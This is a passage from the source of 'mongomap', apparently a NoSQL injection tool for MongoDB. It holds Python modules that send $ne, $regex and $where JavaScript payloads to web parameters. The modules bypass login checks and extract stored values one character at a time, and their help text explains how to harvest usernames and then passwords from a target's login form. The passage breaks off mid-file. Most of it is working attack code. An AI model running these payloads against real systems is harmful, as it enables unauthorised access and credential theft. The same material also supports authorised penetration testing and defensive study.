https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /tests/__pycache__/notEqualsArrayInjection.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/notEqualsArrayInjection.cpython-36.pyc -------------------------------------------------------------------------------- /tests/__pycache__/notEqualsArrayInjection.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/notEqualsArrayInjection.cpython-38.pyc -------------------------------------------------------------------------------- /tests/__pycache__/regexArrayBlindInjection.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/regexArrayBlindInjection.cpython-36.pyc -------------------------------------------------------------------------------- /tests/__pycache__/regexArrayBlindInjection.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/regexArrayBlindInjection.cpython-38.pyc -------------------------------------------------------------------------------- /tests/__pycache__/whereAlwaysTrueFunctionInjection.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/whereAlwaysTrueFunctionInjection.cpython-36.pyc -------------------------------------------------------------------------------- /tests/__pycache__/whereAlwaysTrueFunctionInjection.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/whereAlwaysTrueFunctionInjection.cpython-38.pyc -------------------------------------------------------------------------------- /tests/__pycache__/whereAlwaysTrueInjection.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/whereAlwaysTrueInjection.cpython-36.pyc -------------------------------------------------------------------------------- /tests/__pycache__/whereAlwaysTrueInjection.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/whereAlwaysTrueInjection.cpython-38.pyc -------------------------------------------------------------------------------- /tests/__pycache__/whereBlindFunctionJSONStringifyInjection.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/whereBlindFunctionJSONStringifyInjection.cpython-36.pyc -------------------------------------------------------------------------------- /tests/__pycache__/whereBlindFunctionJSONStringifyInjection.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/whereBlindFunctionJSONStringifyInjection.cpython-38.pyc -------------------------------------------------------------------------------- /tests/__pycache__/whereBlindJSONStringifyInjection.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/whereBlindJSONStringifyInjection.cpython-36.pyc -------------------------------------------------------------------------------- /tests/__pycache__/whereBlindJSONStringifyInjection.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/whereBlindJSONStringifyInjection.cpython-38.pyc -------------------------------------------------------------------------------- /tests/__pycache__/whereObjectIDEnumerationBlindInjection.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/whereObjectIDEnumerationBlindInjection.cpython-36.pyc -------------------------------------------------------------------------------- /tests/__pycache__/whereObjectIDEnumerationBlindInjection.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/whereObjectIDEnumerationBlindInjection.cpython-38.pyc -------------------------------------------------------------------------------- /tests/notEqualsArrayInjection.py: -------------------------------------------------------------------------------- 1 | import copy; 2 | import difflib; 3 | from util.output import verbose; 4 | from util.output import success; 5 | from util.output import failure; 6 | from util.output import info; 7 | from util.output import bold; 8 | 9 | import threading; 10 | from itertools import combinations; 11 | 12 | class NotEqualsArrayInjection: 13 | 14 | def doc(self): 15 | bold("--Description--"); 16 | print("Attempts to send an array with a not-equal parameter instead of single values via \ 17 | post/get requests."); 18 | print(""); 19 | bold("--How it works--"); 20 | print("For example, if your request data was ?search=stuff, where search was your vulnerable \ 21 | parameter, then this module will attempt to send ?search[$ne]=1 instead. MongoDB will then \ 22 | parse this as 'if entry is not equal to 1', and return found entries. If this module is \ 23 | successful, it is recommended to perform manual injection with this method. It may give you \ 24 | unauthorised access."); 25 | bold("--Output--"); 26 | print("This module will attempt to track differences in website content, status code, \ 27 | and cookies. If a difference is detected, the difference will be displayed in console."); 28 | bold("--Extra Notes--"); 29 | print("This module will try different combinations of parameters with the [$ne] addition \ 30 | in order to figure out what combination will yield the best outcome."); 31 | print("E.g. Your test data is 'username=1&password=1'. For the parameter username, the \ 32 | program will try: 'username[$ne]=1&password=1' and 'username[$ne]=1&password[$ne]=1'."); 33 | 34 | 35 | def getID(self): 36 | return 0; 37 | 38 | def getType(self): 39 | return "a"; 40 | 41 | def __init__(self,url,param,scanner): 42 | self.url = url; 43 | self.param = param; 44 | self.scanner = scanner; 45 | self.workingCombinations = []; 46 | 47 | def vulnTest(self): 48 | for data in self.getDataLists(): 49 | verbose("Testing ne combination " + str(data)); 50 | req = self.scanner.sendData(data); 51 | check = self.scanner.check(req); 52 | if check != "none": 53 | verbose(check+" has changed!"); 54 | if data not in self.workingCombinations: 55 | self.workingCombinations.append(data); 56 | 57 | if len(self.workingCombinations) > 0: 58 | return True; 59 | return False; 60 | 61 | def getDataLists(self): 62 | dataList = []; 63 | dataParams = copy.deepcopy(self.scanner.data).keys(); 64 | dataList.append(self.scanner.data); 65 | for i in range(1,len(dataParams)+1): 66 | ways = combinations(dataParams,i); 67 | 68 | for way in ways: 69 | if self.param not in way: 70 | continue; 71 | 72 | data = copy.deepcopy(self.scanner.data); 73 | for param in way: 74 | if self.scanner.method != "json": #GET/POST, send PHP array 75 | val = data.pop(param); 76 | data[param+"[$ne]"] = val; 77 | else: #JSON data. Direct modification 78 | data[param] = {"$ne":data.get(param)}; 79 | if data in dataList: 80 | continue; 81 | dataList.append(data); 82 | return dataList; 83 | 84 | 85 | def grabData(self): 86 | req1 = self.scanner.sendData(self.scanner.data); 87 | results = []; 88 | for data in self.workingCombinations: 89 | results.append(""); 90 | results.append("For payload: " + self.scanner.implodeData(data)); 91 | results.append(""); 92 | req2 = self.scanner.sendData(data); 93 | if req1.status_code != req2.status_code: 94 | change = str(req1.status_code) + " => " + str(req2.status_code); 95 | results.extend(["Status code with the injection is different!",change]); 96 | results.append(""); 97 | 98 | elif req1.text != req2.text: 99 | diff = difflib.unified_diff(req1.text, req2.text) 100 | new = ""; 101 | for item in diff: 102 | if item.startswith("+"): 103 | if len(item) > 2: 104 | continue; 105 | new += item[1]; 106 | if new.strip() != "": 107 | results.extend(["Content Difference:"] + [new]); 108 | results.append(""); 109 | if req1.cookies != req2.cookies: 110 | cookies = []; 111 | oldCookies = req1.cookies.get_dict(); 112 | for key in req2.cookies.get_dict(): 113 | if key in oldCookies: 114 | if oldCookies[key] == req2.cookies.get_dict()[key]: 115 | continue; 116 | cookies.append(key+" : "+req2.cookies.get_dict()[key]); 117 | 118 | if len(cookies) > 0: 119 | results.extend(["New Cookies:"]+cookies); 120 | results.append(""); 121 | 122 | if len(results) == 3*len(self.workingCombinations): 123 | failure("All combinations failed to retrieve data!"); 124 | return None; 125 | 126 | #success("[$ne] injection was a success! Be sure to customise the parameters to attempt regex injection."); 127 | 128 | return results; 129 | 130 | 131 | -------------------------------------------------------------------------------- /tests/regexArrayBlindInjection.py: -------------------------------------------------------------------------------- 1 | import copy; 2 | from util.output import verbose; 3 | from util.output import success; 4 | from util.output import failure; 5 | from util.output import question; 6 | from util.output import bold; 7 | from util.output import info; 8 | 9 | import threading 10 | 11 | class RegexArrayBlindInjection: 12 | def doc(self): 13 | bold("--Description--"); 14 | print("Attempts to send an array with a regex parameter instead of single values via \ 15 | post/get requests in order to steal data sequentially with blind injection."); 16 | print(""); 17 | bold("--How it works--"); 18 | print("First, the module will test if the target is vulnerable (payload is 'param[$regex]=.')."); 19 | print("Then, the module will attempt to gather the data's maximum length with blind injection \ 20 | by repeating a length regex check like so:"); 21 | print("param[$regex]=.{1}"); 22 | print("param[$regex]=.{2}"); 23 | print("param[$regex]=.{3}"); 24 | print("Until the site shows a difference. The module will use the payload 'param[$regex]=^.{length}$' \ 25 | in order to retrieve some different lengths."); 26 | print("For every length retrieved, the module will attempt to steal one piece of data. This is done \ 27 | with repeated regex checks, like such:"); 28 | print("The example here will use the value 'admin'"); 29 | print("param[$regex]=a.{4}"); 30 | print("param[$regex]=aa.{3}"); 31 | print("param[$regex]=ab.{3}"); 32 | print("param[$regex]=ac.{3}"); 33 | print("param[$regex]=ad.{3}"); 34 | print("param[$regex]=ada.{2}"); 35 | print("This repeats until 'admin' can be found."); 36 | bold("--Output--"); 37 | print("This module will output any values it can steal via this method."); 38 | bold("--Extra Notes--"); 39 | print("This module currently cannot steal all values present in the database. Values of the \ 40 | same length will not be stolen as they currently are not differentiated from other values."); 41 | print("This module can be paired very well with some manual [$ne] tags. For example, if you are \ 42 | dealing with a login form, and you know no usernames, you can start with this:"); 43 | print("mongomap.py -u http://target.com/ -method post -data 'username=1&password[$ne]=1' -p username"); 44 | print("This will show as many usernames as the module can find. You can then steal assosiated \ 45 | passwords with:"); 46 | print("mongomap.py -u http://target.com/ -method post -data 'username=stolenuser&password=1' -p password"); 47 | 48 | def getID(self): 49 | return 1; 50 | 51 | def getType(self): 52 | return "a"; 53 | def __init__(self,url,param,scanner): 54 | self.url = url; 55 | self.param = param; 56 | self.scanner = scanner; 57 | self.workingdata = scanner.data; 58 | 59 | def vulnTest(self): 60 | data = copy.deepcopy(self.scanner.data); 61 | self.injectRegex(data,self.param,"."); 62 | #data.pop(self.param); 63 | #data[self.param+"[$regex]"] = "."; 64 | req = self.scanner.sendData(data); 65 | check = self.scanner.check(req); 66 | if check != "none": 67 | verbose(check+" has changed!"); 68 | return True; 69 | return False; 70 | 71 | def grabData(self): 72 | maxLength = self.retrieveMaxLength(); 73 | lengths = self.retrieveLengths(maxLength); 74 | if lengths == -1: 75 | return None; 76 | words = []; 77 | threads = []; 78 | 79 | for length in lengths: 80 | if len(threads) > self.scanner.maxthreads: 81 | threads.pop().join(); 82 | thread = threading.Thread(target = self.grabWordFromLength, args = (words,length)); 83 | threads.append(thread); 84 | thread.start(); 85 | 86 | for thread in threads: 87 | thread.join(); 88 | return words; 89 | 90 | def grabWordFromLength(self,words,length): 91 | words.append(self.grabWord(length)); 92 | 93 | ## def grabWord(self,length): 94 | ## charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'._()*+,-/:;<=>?@{|}[\]^`~ " 95 | ## var = []; 96 | ## while len(self.fromVarToString(var)) < length: 97 | ## prev = len(var); 98 | ## for c in charset: 99 | ## c = "[" + c + "]"; 100 | ## data = copy.deepcopy(self.scanner.data); 101 | ## data.pop(self.param); 102 | ## data[self.param+"[$regex]"] = "".join(var)+c+".{"+str(length-1-len(var))+"}"; 103 | ## #print("".join(var)+c+".{"+str(length-1-len(var))+"}"); 104 | ## req = self.scanner.sendData(data); 105 | ## check = self.scanner.check(req); 106 | ## if check != "none": 107 | ## var.append(c); 108 | ## info(self.fromVarToString(var)); 109 | ## break; 110 | ## if prev == len(var): 111 | ## failure("Something went wrong."); 112 | ## return None; 113 | ## return self.fromVarToString(var); 114 | 115 | def grabWord(self,length): 116 | charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'._()*+,-/:;<=>?@{|}[\]^`~" 117 | var = []; 118 | while len(self.fromVarToString(var)) < length: 119 | prev = len(var); 120 | threads = [] 121 | for c in charset: 122 | if len(threads) > self.scanner.maxthreads: 123 | threads.pop().join(); 124 | thread = threading.Thread(target = self.grabLetter, args = (length,var,c)); 125 | threads.append(thread); 126 | thread.start(); 127 | 128 | for thread in threads: 129 | thread.join(); 130 | 131 | if prev == len(var): 132 | failure("Something went wrong."); 133 | if not question("Try again?"): 134 | return None; 135 | else: 136 | var = []; 137 | continue; 138 | return self.fromVarToString(var); 139 | 140 | def grabLetter(self,length,var,c): 141 | try: 142 | oldVarLength = len(var); 143 | if c == "\\": 144 | c += c; #Make sure it's escaped 145 | if c == "^": 146 | c = "\\^"; #Make sure this is escaped. ^ means anything 147 | c = "[" + c + "]"; 148 | data = copy.deepcopy(self.scanner.data); 149 | self.injectRegex(data,self.param,"^"+"".join(var)+c+".{"+str(length-1-len(var))+"}$"); 150 | #data.pop(self.param); 151 | #data[self.param+"[$regex]"] = "^"+"".join(var)+c+".{"+str(length-1-len(var))+"}$"; 152 | #print("^"+"".join(var)+c+".{"+str(length-1-len(var))+"}$"); 153 | req = self.scanner.sendData(data); 154 | check = self.scanner.check(req); 155 | if check != "none": 156 | if len(var) == oldVarLength: 157 | var.append(c); 158 | info(self.fromVarToString(var) + "."*(length-len(var))); 159 | except Exception as e: 160 | failure(str(e)); 161 | self.grabLetter(length,var,c); 162 | 163 | def fromVarToString(self,var): 164 | string = ""; 165 | for i in var: 166 | if len(i) == 3: 167 | string += i[1]; 168 | else: 169 | string += i; 170 | return string; 171 | 172 | def retrieveLengths(self,maxLength): 173 | lengths = []; 174 | for length in range(1,maxLength+1): 175 | try: 176 | data = copy.deepcopy(self.scanner.data); 177 | self.injectRegex(data,self.param,"^(.{"+str(length)+"})$"); 178 | #data.pop(self.param); 179 | #data[self.param+"[$regex]"] = "^(.{"+str(length)+"})$"; 180 | req = self.scanner.sendData(data); 181 | check = self.scanner.check(req); 182 | if check != "none": 183 | lengths.append(length); 184 | success("Retrieved length " + str(length)); 185 | except Exception as e: 186 | print(e); 187 | failure("Failed to retrieve exact length."); 188 | return lengths; 189 | return lengths; 190 | 191 | def retrieveMaxLength(self): 192 | try: 193 | length = 1; 194 | data = copy.deepcopy(self.scanner.data); 195 | self.injectRegex(data,self.param,".{"+str(length)+"}"); 196 | #data.pop(self.param); 197 | #data[self.param+"[$regex]"] = ".{"+str(length)+"}"; 198 | req = self.scanner.sendData(data); 199 | check = self.scanner.check(req); 200 | 201 | while check != "none": 202 | if length == 70: 203 | if question("Length abnormally long. Do you want to terminate the program?"): 204 | return -1; 205 | length += 1; 206 | data = copy.deepcopy(self.scanner.data); 207 | self.injectRegex(data,self.param,".{"+str(length)+"}"); 208 | #data.pop(self.param); 209 | #data[self.param+"[$regex]"] = ".{"+str(length)+"}"; 210 | req = self.scanner.sendData(data); 211 | check = self.scanner.check(req); 212 | 213 | success("Retrieved max length: " + str(length-1)); 214 | return length-1; 215 | except Exception as e: 216 | print(e); 217 | failure("Failed to retrieve max length."); 218 | return -1; 219 | 220 | def injectRegex(self,data,param,value): 221 | if self.scanner.method == "json": 222 | data[param] = {"$regex":value}; 223 | else: 224 | data.pop(self.param); 225 | data[self.param+"[$regex]"] = value; 226 | 227 | -------------------------------------------------------------------------------- /tests/whereAlwaysTrueFunctionInjection.py: -------------------------------------------------------------------------------- 1 | import copy; 2 | import difflib; 3 | from util.output import verbose; 4 | from util.output import success; 5 | from util.output import failure; 6 | from util.output import question; 7 | from util.output import info; 8 | from util.output import bold; 9 | 10 | import threading; 11 | from itertools import combinations; 12 | 13 | class WhereAlwaysTrueFunctionInjection: 14 | def doc(self): 15 | bold("--Description--"); 16 | print("Attempts to exploit javascript injection in a mongodb injection point to trigger \ 17 | unwanted behaviour from MongoDB"); 18 | print(""); 19 | bold("--How it works--"); 20 | print("The target must be using a '$where' check, with a javascript function parsed in string."); 21 | print("This module will send a payload looking like one of these:"); 22 | print("'; return this; var dum = '"); 23 | print("'; return this; var dum = "); 24 | print("; return this; var dum = '"); 25 | print("; return this; var dum = ''"); 26 | print("; return this; var dum = "); 27 | print("\"; return this; var dum = \""); 28 | print("\"; return this; var dum = "); 29 | print("; return this; var dum = \""); 30 | print("; return this; var dum = \"\""); 31 | print("If a difference in webpage content, status or cookies is detected, \ 32 | this module will find it."); 33 | bold("--Output--"); 34 | print("This module will output differences it finds."); 35 | bold("--Extra Notes--"); 36 | print("Not to be confused with whereAlwaysTrueInjection. This module requires a javascript execution \ 37 | point to function."); 38 | print("This may have some false positives if the target is also vulnerable to whereAlwaysTrueInjection."); 39 | 40 | def getID(self): 41 | return 2; 42 | 43 | def getType(self): 44 | return "w"; 45 | def __init__(self,url,param,scanner): 46 | self.url = url; 47 | self.param = param; 48 | self.scanner = scanner; 49 | self.options = {'q':"'","front":True,"back":True}; 50 | #q, quote to use 51 | #front, if payload must start with quote 52 | #back, if payload must end with quote 53 | self.toGrabInFuture = []; 54 | self.entries = []; 55 | self.slice = ".slice(43,-1)"; 56 | 57 | def vulnTest(self): 58 | failPayl = "\\"; 59 | data = copy.deepcopy(self.scanner.data); 60 | data[self.param] = failPayl; 61 | self.scanner.textErrorBaseline = self.scanner.sendData(data).text; 62 | 63 | if self.scanner.textErrorBaseline != self.scanner.textBaseline: 64 | success("Basic check succeeded!"); 65 | else: 66 | bold("Basic check failed. The rest of this module may not work."); 67 | 68 | for options in self.getAllOptions(): 69 | verbose("Testing with: " + str(options)); 70 | data = copy.deepcopy(self.scanner.data); 71 | data[self.param] = self.buildPayload(options,"; return this; var dum = "); 72 | req = self.scanner.sendData(data); 73 | if req.text != self.scanner.textErrorBaseline: 74 | self.options = options; 75 | success("Error-based content check worked!"); 76 | success("Payload built!"); 77 | success(data[self.param]); 78 | return True; 79 | return False; 80 | 81 | def getAllOptions(self): 82 | allOptions = [{'q':"'","front":True,"back":True},\ 83 | {'q':"'","front":False,"back":True},\ 84 | {'q':"'","front":True,"back":False},\ 85 | {'q':"'","front":False,"back":False},\ 86 | {'q':"\"","front":True,"back":True},\ 87 | {'q':"\"","front":False,"back":True},\ 88 | {'q':"\"","front":True,"back":False},\ 89 | {'q':"\"","front":False,"back":False},\ 90 | ]; 91 | return allOptions; 92 | 93 | def buildPayload(self,options,payload): 94 | q = options["q"]; 95 | reverseQuotes = '"'; 96 | if q == '"': 97 | reverseQuotes = "'"; 98 | front = options["front"]; 99 | back = options["back"]; 100 | #payload = payload.replace("'",q); 101 | #payload = payload.replace("\\\"",reverseQuotes); 102 | if front: 103 | payload = q + payload; 104 | 105 | payload += q; 106 | if back: 107 | payload += q; 108 | 109 | return payload; 110 | 111 | def grabData(self): 112 | results = []; 113 | req1 = self.scanner.sendData(self.scanner.data); 114 | results.append(""); 115 | results.append(""); 116 | data = copy.deepcopy(self.scanner.data); 117 | data[self.param] = self.buildPayload(self.options,"; return this; var dum = "); 118 | req = self.scanner.sendData(data); 119 | req2 = self.scanner.sendData(data); 120 | results.append("For payload: " + data[self.param]); 121 | if req1.status_code != req2.status_code: 122 | change = str(req1.status_code) + " => " + str(req2.status_code); 123 | results.extend(["Status code with the injection is different!",change]); 124 | results.append(""); 125 | 126 | elif req1.text != req2.text: 127 | diff = difflib.unified_diff(req1.text, req2.text) 128 | new = ""; 129 | for item in diff: 130 | if item.startswith("+"): 131 | if len(item) > 2: 132 | continue; 133 | new += item[1]; 134 | if new.strip() != "": 135 | results.extend(["Content Difference:"] + [new]); 136 | results.append(""); 137 | if req1.cookies != req2.cookies: 138 | cookies = []; 139 | oldCookies = req1.cookies.get_dict(); 140 | for key in req2.cookies.get_dict(): 141 | if key in oldCookies: 142 | if oldCookies[key] == req2.cookies.get_dict()[key]: 143 | continue; 144 | cookies.append(key+" : "+req2.cookies.get_dict()[key]); 145 | 146 | if len(cookies) > 0: 147 | results.extend(["New Cookies:"]+cookies); 148 | results.append(""); 149 | if len(results) == 3: 150 | failure("No differences could be found."); 151 | return None; 152 | return results; -------------------------------------------------------------------------------- /tests/whereAlwaysTrueInjection.py: -------------------------------------------------------------------------------- 1 | import copy; 2 | import difflib; 3 | from util.output import verbose; 4 | from util.output import success; 5 | from util.output import failure; 6 | from util.output import question; 7 | from util.output import info; 8 | from util.output import bold; 9 | 10 | import threading; 11 | from itertools import combinations; 12 | 13 | class WhereAlwaysTrueInjection: 14 | def doc(self): 15 | bold("--Description--"); 16 | print("Attempts to exploit a one liner where check in a mongodb injection point to display \ 17 | data, bypassing any mongodb check."); 18 | print(""); 19 | bold("--How it works--"); 20 | print("The target must be using a '$where' check that is only a one liner. Example:"); 21 | print("$where: \"this.username == '\".$_POST[\"username\"].\"'\""); 22 | print("This module will send a payload looking like one of these:"); 23 | print("' || '' == '"); 24 | print("' || '' == "); 25 | print(" || '' == '"); 26 | print(" || '' == ''"); 27 | print(" || '' == "); 28 | print("\" || '' == \""); 29 | print("\" || '' == "); 30 | print(" || '' == \""); 31 | print(" || '' == \"\""); 32 | print("If a difference in webpage content, status or cookies is detected, \ 33 | this module will find it."); 34 | bold("--Output--"); 35 | print("This module will output differences it finds."); 36 | bold("--Extra Notes--"); 37 | print("Not to be confused with whereAlwaysTrueFunctionInjection. If the target has a javascript \ 38 | function in their $where, and the injection point is not in the return area, then this \ 39 | module may not work."); 40 | print("This may have some false positives if the target is also vulnerable to whereAlwaysTrueFunctionInjection."); 41 | 42 | def getID(self): 43 | return 4; 44 | 45 | def getType(self): 46 | return "w"; 47 | def __init__(self,url,param,scanner): 48 | self.url = url; 49 | self.param = param; 50 | self.scanner = scanner; 51 | self.options = {'q':"'","front":True,"back":True}; 52 | #q, quote to use 53 | #front, if payload must start with quote 54 | #back, if payload must end with quote 55 | self.toGrabInFuture = []; 56 | self.entries = []; 57 | 58 | def vulnTest(self): 59 | failPayl = "\\"; 60 | data = copy.deepcopy(self.scanner.data); 61 | data[self.param] = failPayl; 62 | self.scanner.textErrorBaseline = self.scanner.sendData(data).text; 63 | 64 | if self.scanner.textErrorBaseline != self.scanner.textBaseline: 65 | success("Basic check succeeded!"); 66 | else: 67 | bold("Basic check failed. The rest of this module may not work."); 68 | 69 | for options in self.getAllOptions(): 70 | verbose("Testing with: " + str(options)); 71 | data = copy.deepcopy(self.scanner.data); 72 | data[self.param] = self.buildPayload(options," || '' == "); 73 | req = self.scanner.sendData(data); 74 | if req.text != self.scanner.textErrorBaseline: 75 | self.options = options; 76 | success("Error-based content check worked!"); 77 | success("Payload built!"); 78 | success(data[self.param]); 79 | return True; 80 | return False; 81 | 82 | def getAllOptions(self): 83 | allOptions = [{'q':"'","front":True,"back":True},\ 84 | {'q':"'","front":False,"back":True},\ 85 | {'q':"'","front":True,"back":False},\ 86 | {'q':"'","front":False,"back":False},\ 87 | {'q':"\"","front":True,"back":True},\ 88 | {'q':"\"","front":False,"back":True},\ 89 | {'q':"\"","front":True,"back":False},\ 90 | {'q':"\"","front":False,"back":False},\ 91 | ]; 92 | return allOptions; 93 | 94 | def buildPayload(self,options,payload): 95 | q = options["q"]; 96 | reverseQuotes = '"'; 97 | if q == '"': 98 | reverseQuotes = "'"; 99 | front = options["front"]; 100 | back = options["back"]; 101 | #payload = payload.replace("'",q); 102 | #payload = payload.replace("\\\"",reverseQuotes); 103 | if front: 104 | payload = q + payload; 105 | 106 | payload += q; 107 | if back: 108 | payload += q; 109 | 110 | return payload; 111 | 112 | def grabData(self): 113 | results = []; 114 | req1 = self.scanner.sendData(self.scanner.data); 115 | results.append(""); 116 | results.append(""); 117 | data = copy.deepcopy(self.scanner.data); 118 | data[self.param] = self.buildPayload(self.options," || '' == "); 119 | req = self.scanner.sendData(data); 120 | req2 = self.scanner.sendData(data); 121 | results.append("For payload: " + data[self.param]); 122 | if req1.status_code != req2.status_code: 123 | change = str(req1.status_code) + " => " + str(req2.status_code); 124 | results.extend(["Status code with the injection is different!",change]); 125 | results.append(""); 126 | 127 | elif req1.text != req2.text: 128 | diff = difflib.unified_diff(req1.text, req2.text) 129 | new = ""; 130 | for item in diff: 131 | if item.startswith("+"): 132 | if len(item) > 2: 133 | continue; 134 | new += item[1]; 135 | if new.strip() != "": 136 | results.extend(["Content Difference:"] + [new]); 137 | results.append(""); 138 | if req1.cookies != req2.cookies: 139 | cookies = []; 140 | oldCookies = req1.cookies.get_dict(); 141 | for key in req2.cookies.get_dict(): 142 | if key in oldCookies: 143 | if oldCookies[key] == req2.cookies.get_dict()[key]: 144 | continue; 145 | cookies.append(key+" : "+req2.cookies.get_dict()[key]); 146 | 147 | if len(cookies) > 0: 148 | results.extend(["New Cookies:"]+cookies); 149 | results.append(""); 150 | if len(results) == 3: 151 | failure("No differences could be found."); 152 | return None; 153 | return results; -------------------------------------------------------------------------------- /tests/whereBlindFunctionJSONStringifyInjection.py: -------------------------------------------------------------------------------- 1 | import copy; 2 | import difflib; 3 | from util.output import verbose; 4 | from util.output import success; 5 | from util.output import failure; 6 | from util.output import question; 7 | from util.output import info; 8 | from util.output import bold; 9 | 10 | import threading; 11 | from itertools import combinations; 12 | 13 | class WhereBlindFunctionJSONStringifyInjection: 14 | def doc(self): 15 | bold("--Description--"); 16 | print("Attempts to exploit javascript injection in a mongodb injection point to gather \ 17 | data via blind injection. Uses JSONStringify to get json objects in the form of strings."); 18 | print(""); 19 | bold("--How it works--"); 20 | print("The target must be using a '$where' check, with a javascript function parsed in string."); 21 | print("This module will use JSONStringify and startsWith to gather data. Payloads look like these:"); 22 | print("'; if(JSON.stringify(this).slice(42,-1).startsWith('\"')){ return this; }; var dum = '"); 23 | print("'; if(JSON.stringify(this).slice(42,-1).startsWith('\"u')){ return this; }; var dum = '"); 24 | print("'; if(JSON.stringify(this).slice(42,-1).startsWith('\"us')){ return this; }; var dum = '"); 25 | print("'; if(JSON.stringify(this).slice(42,-1).startsWith('\"use')){ return this; }; var dum = '"); 26 | print("'; if(JSON.stringify(this).slice(42,-1).startsWith('\"user')){ return this; }; var dum = '"); 27 | print("If a difference in webpage content, status or cookies is detected, \ 28 | this module will be able to extract values one letter at a time until a whole value is found."); 29 | bold("--Output--"); 30 | print("This module will output any values it can steal via this method."); 31 | bold("--Extra Notes--"); 32 | print(".slice(42,-01) is added if you want to omit ObjectID dumping. It will speed up the module \ 33 | significantly, since objectIDs are pretty long. You can still dump objectIDs by answering the console prompt."); 34 | print("Like whereAlwaysTrueFunctionInjection, the trailing and leading quotes are added and removed \ 35 | to test automatically for different injection points."); 36 | print("This module will fail to find some results in slow network conditions. If you only get 1 entry, \ 37 | it is recommended to rerun this module."); 38 | print("This may have some false positives if the target is also vulnerable to whereAlwaysTrueInjection."); 39 | print("Setting maxthreads beyond a certain limit does not increase the speed of this module. Feel free to \ 40 | set maxthreads as high as you want."); 41 | 42 | def getID(self): 43 | return 3; 44 | 45 | def getType(self): 46 | return "w"; 47 | def __init__(self,url,param,scanner): 48 | self.url = url; 49 | self.param = param; 50 | self.scanner = scanner; 51 | self.options = {'q':"'","front":True,"back":True}; 52 | #q, quote to use 53 | #front, if payload must start with quote 54 | #back, if payload must end with quote 55 | self.toGrabInFuture = []; 56 | self.entries = []; 57 | self.slice = ".slice(43,-1)"; 58 | 59 | def vulnTest(self): 60 | failPayl = "\\"; 61 | data = copy.deepcopy(self.scanner.data); 62 | data[self.param] = failPayl; 63 | self.scanner.textErrorBaseline = self.scanner.sendData(data).text; 64 | 65 | if self.scanner.textErrorBaseline != self.scanner.textBaseline: 66 | success("Basic check succeeded!"); 67 | else: 68 | bold("Basic check failed. The rest of this module may not work."); 69 | 70 | for options in self.getAllOptions(): 71 | verbose("Testing with: " + str(options)); 72 | data = copy.deepcopy(self.scanner.data); 73 | data[self.param] = self.buildPayload(options,"; if(JSON.stringify(this).startsWith('{')){ return this; }; var dum = "); 74 | req = self.scanner.sendData(data); 75 | if req.text != self.scanner.textErrorBaseline: 76 | self.options = options; 77 | success("Error-based content check worked!"); 78 | success("Payload built!"); 79 | return True; 80 | return False; 81 | 82 | def getAllOptions(self): 83 | allOptions = [{'q':"'","front":True,"back":True},\ 84 | {'q':"'","front":False,"back":True},\ 85 | {'q':"'","front":True,"back":False},\ 86 | {'q':"'","front":False,"back":False},\ 87 | {'q':"\"","front":True,"back":True},\ 88 | {'q':"\"","front":False,"back":True},\ 89 | {'q':"\"","front":True,"back":False},\ 90 | {'q':"\"","front":False,"back":False},\ 91 | ]; 92 | return allOptions; 93 | 94 | def buildPayload(self,options,payload): 95 | q = options["q"]; 96 | reverseQuotes = '"'; 97 | if q == '"': 98 | reverseQuotes = "'"; 99 | front = options["front"]; 100 | back = options["back"]; 101 | #payload = payload.replace("'",q); 102 | #payload = payload.replace("\\\"",reverseQuotes); 103 | if front: 104 | payload = q + payload; 105 | 106 | payload += q; 107 | if back: 108 | payload += q; 109 | 110 | return payload; 111 | 112 | def grabData(self): 113 | bold("Be warned that this module may take some time to retrieve output."); 114 | if not question("Omit ObjectID from dump? (Faster)"): 115 | self.slice = ""; 116 | self.grabEntries(); 117 | if len(self.entries) == 0: 118 | failure("Nothing was retrieved with this module. Maybe false positive?"); 119 | return None; 120 | return ["Found Entries:"] + 